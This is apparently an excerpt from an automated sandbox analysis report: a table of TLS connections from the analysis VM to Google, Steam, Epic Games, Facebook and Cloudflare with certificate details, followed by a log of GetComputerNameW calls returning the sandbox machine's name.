TLSv1 192.168.56.103:49208 172.217.31.3:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	eb:59:e9:f3:0f:ce:d8:1a:8c:bb:ee:7d:2e:b7:b8:39:73:7a:ce:28
TLSv1 192.168.56.103:49243 142.250.66.45:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	16:5a:f1:76:25:96:2a:7f:80:a7:89:81:ce:d5:f4:5f:3d:29:9c:93
TLSv1 192.168.56.103:49242 142.250.66.45:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	16:5a:f1:76:25:96:2a:7f:80:a7:89:81:ce:d5:f4:5f:3d:29:9c:93
TLSv1 192.168.56.103:49248 172.217.31.3:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	eb:59:e9:f3:0f:ce:d8:1a:8c:bb:ee:7d:2e:b7:b8:39:73:7a:ce:28
TLSv1 192.168.56.103:49247 172.217.31.3:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	eb:59:e9:f3:0f:ce:d8:1a:8c:bb:ee:7d:2e:b7:b8:39:73:7a:ce:28
TLSv1 192.168.56.103:49207 172.217.31.3:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	eb:59:e9:f3:0f:ce:d8:1a:8c:bb:ee:7d:2e:b7:b8:39:73:7a:ce:28
TLSv1 192.168.56.103:49251 104.76.78.101:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA	unknown=US, unknown=Washington, unknown=Private Organization, serialNumber=602 290 773, C=US, ST=Washington, L=Bellevue, O=Valve Corp, CN=store.steampowered.com	b1:30:5e:4c:ee:14:70:87:a7:d7:1c:77:07:b5:3c:2c:99:13:aa:c5
TLSv1 192.168.56.103:49254 52.45.237.32:443	C=US, O=Amazon, CN=Amazon RSA 2048 M02	CN=epicgames.com	21:bc:17:60:8c:aa:c2:6d:83:1b:00:7b:40:7b:7e:f4:14:72:79:24
TLSv1 192.168.56.103:49253 104.76.78.101:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA	unknown=US, unknown=Washington, unknown=Private Organization, serialNumber=602 290 773, C=US, ST=Washington, L=Bellevue, O=Valve Corp, CN=store.steampowered.com	b1:30:5e:4c:ee:14:70:87:a7:d7:1c:77:07:b5:3c:2c:99:13:aa:c5
TLSv1 192.168.56.103:49252 52.45.237.32:443	C=US, O=Amazon, CN=Amazon RSA 2048 M02	CN=epicgames.com	21:bc:17:60:8c:aa:c2:6d:83:1b:00:7b:40:7b:7e:f4:14:72:79:24
TLSv1 192.168.56.103:49278 18.64.8.127:443	C=US, O=Amazon, CN=Amazon RSA 2048 M03	CN=unrealengine.com	ea:72:01:d4:ef:e9:b1:f1:59:58:8b:4d:c0:ea:57:c2:c6:28:7b:bf
TLSv1 192.168.56.103:49261 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49256 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49265 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49266 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49263 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49260 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49272 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49277 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49267 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49273 172.64.145.151:443	None	None	None
TLSv1 192.168.56.103:49269 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49271 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49276 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49270 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49274 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49255 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49264 172.64.145.151:443	None	None	None
TLSv1 192.168.56.103:49268 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49275 172.64.145.151:443	None	None	None
TLSv1 192.168.56.103:49280 18.64.8.127:443	C=US, O=Amazon, CN=Amazon RSA 2048 M03	CN=unrealengine.com	ea:72:01:d4:ef:e9:b1:f1:59:58:8b:4d:c0:ea:57:c2:c6:28:7b:bf
TLSv1 192.168.56.103:49293 142.251.220.78:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.google.com	fd:ee:45:21:a2:3c:95:82:9b:ba:3f:7a:59:3c:f6:c2:7b:c7:84:8f
TLSv1 192.168.56.103:49301 142.251.130.3:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	eb:59:e9:f3:0f:ce:d8:1a:8c:bb:ee:7d:2e:b7:b8:39:73:7a:ce:28
TLSv1 192.168.56.103:49302 142.251.130.3:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	eb:59:e9:f3:0f:ce:d8:1a:8c:bb:ee:7d:2e:b7:b8:39:73:7a:ce:28
TLSv1 192.168.56.103:49305 142.250.66.45:443	None	None	None
TLSv1 192.168.56.103:49341 172.217.31.3:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	eb:59:e9:f3:0f:ce:d8:1a:8c:bb:ee:7d:2e:b7:b8:39:73:7a:ce:28
TLSv1 192.168.56.103:49317 216.58.200.228:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	f5:cc:da:b5:ba:1e:14:14:44:cc:27:90:92:cc:60:1f:5f:08:af:77
TLSv1 192.168.56.103:49375 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	5a:83:30:0a:17:98:39:98:d5:d5:3d:0e:0e:37:2c:d4:b2:41:7e:6b
TLSv1 192.168.56.103:49392 142.250.66.45:443	None	None	None
TLSv1 192.168.56.103:49292 142.251.220.78:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.google.com	fd:ee:45:21:a2:3c:95:82:9b:ba:3f:7a:59:3c:f6:c2:7b:c7:84:8f
TLSv1 192.168.56.103:49320 142.251.220.78:443	None	None	None
TLSv1 192.168.56.103:49391 142.250.66.45:443	None	None	None
TLSv1 192.168.56.103:49296 142.250.66.42:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=upload.video.google.com	fa:d7:68:e4:12:7d:fe:22:87:de:95:f1:1e:49:5a:49:fa:12:1e:b9
TLSv1 192.168.56.103:49335 142.250.66.45:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	16:5a:f1:76:25:96:2a:7f:80:a7:89:81:ce:d5:f4:5f:3d:29:9c:93
TLSv1 192.168.56.103:49367 172.217.31.3:443	None	None	None
TLSv1 192.168.56.103:49378 157.240.215.14:443	None	None	None
TLSv1 192.168.56.103:49303 142.251.130.3:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	eb:59:e9:f3:0f:ce:d8:1a:8c:bb:ee:7d:2e:b7:b8:39:73:7a:ce:28
TLSv1 192.168.56.103:49386 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=fbcdn.net	e2:c1:c8:99:6c:b8:a9:96:b0:6e:6e:d3:41:74:7a:c8:39:89:3f:5a
TLSv1 192.168.56.103:49387 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=fbcdn.net	e2:c1:c8:99:6c:b8:a9:96:b0:6e:6e:d3:41:74:7a:c8:39:89:3f:5a
TLSv1 192.168.56.103:49389 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	5a:83:30:0a:17:98:39:98:d5:d5:3d:0e:0e:37:2c:d4:b2:41:7e:6b
TLSv1 192.168.56.103:49390 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	5a:83:30:0a:17:98:39:98:d5:d5:3d:0e:0e:37:2c:d4:b2:41:7e:6b
TLSv1 192.168.56.103:49319 142.251.220.78:443	None	None	None
TLSv1 192.168.56.103:49307 142.250.66.45:443	None	None	None
TLSv1 192.168.56.103:49394 172.217.31.3:443	None	None	None
TLSv1 192.168.56.103:49416 104.75.41.21:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA	unknown=US, unknown=Washington, unknown=Private Organization, serialNumber=602 290 773, C=US, ST=Washington, L=Bellevue, O=Valve Corp, CN=store.steampowered.com	b1:30:5e:4c:ee:14:70:87:a7:d7:1c:77:07:b5:3c:2c:99:13:aa:c5
TLSv1 192.168.56.103:49424 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49415 104.75.41.21:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA	unknown=US, unknown=Washington, unknown=Private Organization, serialNumber=602 290 773, C=US, ST=Washington, L=Bellevue, O=Valve Corp, CN=store.steampowered.com	b1:30:5e:4c:ee:14:70:87:a7:d7:1c:77:07:b5:3c:2c:99:13:aa:c5
TLSv1 192.168.56.103:49419 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49429 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49422 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49435 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49437 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49421 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49439 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49436 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49426 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49434 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49431 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49452 142.250.204.46:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.google.com	fd:ee:45:21:a2:3c:95:82:9b:ba:3f:7a:59:3c:f6:c2:7b:c7:84:8f
TLSv1 192.168.56.103:49451 142.250.204.46:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.google.com	fd:ee:45:21:a2:3c:95:82:9b:ba:3f:7a:59:3c:f6:c2:7b:c7:84:8f
TLSv1 192.168.56.103:49432 172.64.145.151:443	None	None	None
TLSv1 192.168.56.103:49454 142.250.66.42:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=upload.video.google.com	fa:d7:68:e4:12:7d:fe:22:87:de:95:f1:1e:49:5a:49:fa:12:1e:b9
TLSv1 192.168.56.103:49456 142.251.130.3:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	eb:59:e9:f3:0f:ce:d8:1a:8c:bb:ee:7d:2e:b7:b8:39:73:7a:ce:28
TLSv1 192.168.56.103:49440 18.64.8.109:443	C=US, O=Amazon, CN=Amazon RSA 2048 M03	CN=unrealengine.com	ea:72:01:d4:ef:e9:b1:f1:59:58:8b:4d:c0:ea:57:c2:c6:28:7b:bf
TLSv1 192.168.56.103:49457 142.251.130.3:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	eb:59:e9:f3:0f:ce:d8:1a:8c:bb:ee:7d:2e:b7:b8:39:73:7a:ce:28
TLSv1 192.168.56.103:49374 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	5a:83:30:0a:17:98:39:98:d5:d5:3d:0e:0e:37:2c:d4:b2:41:7e:6b
TLSv1 192.168.56.103:49370 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	5a:83:30:0a:17:98:39:98:d5:d5:3d:0e:0e:37:2c:d4:b2:41:7e:6b
TLSv1 192.168.56.103:49376 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	5a:83:30:0a:17:98:39:98:d5:d5:3d:0e:0e:37:2c:d4:b2:41:7e:6b
TLSv1 192.168.56.103:49379 157.240.215.14:443	None	None	None
TLSv1 192.168.56.103:49373 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	5a:83:30:0a:17:98:39:98:d5:d5:3d:0e:0e:37:2c:d4:b2:41:7e:6b
TLSv1 192.168.56.103:49372 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	5a:83:30:0a:17:98:39:98:d5:d5:3d:0e:0e:37:2c:d4:b2:41:7e:6b
TLSv1 192.168.56.103:49393 172.217.31.3:443	None	None	None
TLSv1 192.168.56.103:49381 157.240.215.14:443	None	None	None
TLSv1 192.168.56.103:49259 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49383 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	5a:83:30:0a:17:98:39:98:d5:d5:3d:0e:0e:37:2c:d4:b2:41:7e:6b
TLSv1 192.168.56.103:49423 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49262 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49384 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	5a:83:30:0a:17:98:39:98:d5:d5:3d:0e:0e:37:2c:d4:b2:41:7e:6b
TLSv1 192.168.56.103:49420 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49385 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=fbcdn.net	e2:c1:c8:99:6c:b8:a9:96:b0:6e:6e:d3:41:74:7a:c8:39:89:3f:5a
TLSv1 192.168.56.103:49425 172.64.145.151:443	None	None	None
TLSv1 192.168.56.103:49368 172.217.31.3:443	None	None	None
TLSv1 192.168.56.103:49428 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49279 18.64.8.127:443	C=US, O=Amazon, CN=Amazon RSA 2048 M03	CN=unrealengine.com	ea:72:01:d4:ef:e9:b1:f1:59:58:8b:4d:c0:ea:57:c2:c6:28:7b:bf
TLSv1 192.168.56.103:49441 18.64.8.109:443	C=US, O=Amazon, CN=Amazon RSA 2048 M03	CN=unrealengine.com	ea:72:01:d4:ef:e9:b1:f1:59:58:8b:4d:c0:ea:57:c2:c6:28:7b:bf
TLSv1 192.168.56.103:49430 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49308 142.250.66.45:443	None	None	None
TLSv1 192.168.56.103:49442 18.64.8.109:443	C=US, O=Amazon, CN=Amazon RSA 2048 M03	CN=unrealengine.com	ea:72:01:d4:ef:e9:b1:f1:59:58:8b:4d:c0:ea:57:c2:c6:28:7b:bf
TLSv1 192.168.56.103:49316 216.58.200.228:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	f5:cc:da:b5:ba:1e:14:14:44:cc:27:90:92:cc:60:1f:5f:08:af:77
TLSv1 192.168.56.103:49336 142.250.66.45:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	16:5a:f1:76:25:96:2a:7f:80:a7:89:81:ce:d5:f4:5f:3d:29:9c:93
TLSv1 192.168.56.103:49458 142.251.130.3:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	eb:59:e9:f3:0f:ce:d8:1a:8c:bb:ee:7d:2e:b7:b8:39:73:7a:ce:28
TLSv1 192.168.56.103:49461 172.217.31.3:443	None	None	None
TLSv1 192.168.56.103:49460 172.217.31.3:443	None	None	None
TLSv1 192.168.56.103:49340 172.217.31.3:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	eb:59:e9:f3:0f:ce:d8:1a:8c:bb:ee:7d:2e:b7:b8:39:73:7a:ce:28
TLSv1 192.168.56.103:49371 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	5a:83:30:0a:17:98:39:98:d5:d5:3d:0e:0e:37:2c:d4:b2:41:7e:6b
TLSv1 192.168.56.103:49377 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	5a:83:30:0a:17:98:39:98:d5:d5:3d:0e:0e:37:2c:d4:b2:41:7e:6b
TLSv1 192.168.56.103:49380 157.240.215.14:443	None	None	None
TLSv1 192.168.56.103:49388 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=fbcdn.net	e2:c1:c8:99:6c:b8:a9:96:b0:6e:6e:d3:41:74:7a:c8:39:89:3f:5a
TLSv1 192.168.56.103:49418 54.175.89.124:443	C=US, O=Amazon, CN=Amazon RSA 2048 M02	CN=epicgames.com	21:bc:17:60:8c:aa:c2:6d:83:1b:00:7b:40:7b:7e:f4:14:72:79:24
TLSv1 192.168.56.103:49417 54.175.89.124:443	C=US, O=Amazon, CN=Amazon RSA 2048 M02	CN=epicgames.com	21:bc:17:60:8c:aa:c2:6d:83:1b:00:7b:40:7b:7e:f4:14:72:79:24
TLSv1 192.168.56.103:49427 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49433 172.64.145.151:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1 192.168.56.103:49438 172.64.145.151:443	None	None	None
TLSv1 192.168.56.103:49455 142.250.66.42:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=upload.video.google.com	fa:d7:68:e4:12:7d:fe:22:87:de:95:f1:1e:49:5a:49:fa:12:1e:b9

Queries for the computername (50 out of 74 events)

Time & API	Arguments	Status	Return
GetComputerNameW Nov. 3, 2023, 12:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:03 p.m.	computer_name: TEST22-PC	1	1
